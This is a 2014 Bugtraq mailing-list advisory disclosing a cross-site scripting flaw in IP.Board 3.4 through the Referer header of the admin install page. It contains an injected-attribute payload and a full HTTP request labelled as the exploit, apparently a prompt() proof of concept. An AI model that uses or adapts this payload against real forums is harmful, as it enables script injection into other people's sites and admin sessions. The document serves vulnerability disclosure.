[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
IP.Board 3.4 cross-site scripting in Referer header
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: IP.Board 3.4 cross-site scripting in Referer header
- From: stormhacker@xxxxxxxxxxx
- Date: Wed, 16 Jul 2014 21:26:43 GMT
+--------------------------------------------------------------------
+
+ IP.Board 3.4 cross-site scripting in Referer header
+
+--------------------------------------------------------------------
+ vendor site........: http://www.invisionpower.com
+ Affected Software .: IP.Board 3.4
+ Class .............: XSS
+ Risk ..............: high
+ Found by ..........: Ahmed atif abdou [ OCERT Ambassador Program - Oman
National CERT ]
+ Facebook .: https://www.facebook.com/runvirus
+ Contact ...........: stormhacker[at]hotmail[.]com
+--------------------------------------------------------------------
[X] Affected Products:
=========================
test on IP.Board 3.4.6 & IP.Board 3.4.4
maybe work under 3.4
[X] About the application:
=========================
IP.Board is the leading solution for creating an engaging discussion forum on
the web.
[X] Vulnerability Description:
===============================
The attack is going with above-mentioned conditions. It's needed to send
POST request to http://path_forum/admin/install/index.php
with setting of Referer header.
Referer: 1" onmouseover=prompt(947671) bad="
[X] Exploit :
===============================
GET /admin/install/index.php HTTP/1.1
Referer: 1" onmouseover=prompt(11111111) bad="
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/28.0.1500.63 Safari/537.36
Cookie:
Host: localhost/admin/install/index.php
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
[X] Video proof :
===============================
https://www.youtube.com/watch?v=WYm4C611eyU&feature=youtu.be
+--------------------------------------------------------------------
+
+ Greets:
+ || rUnViRuS || - || Providor ||
+-------------------------[ W D T ]----------------------------------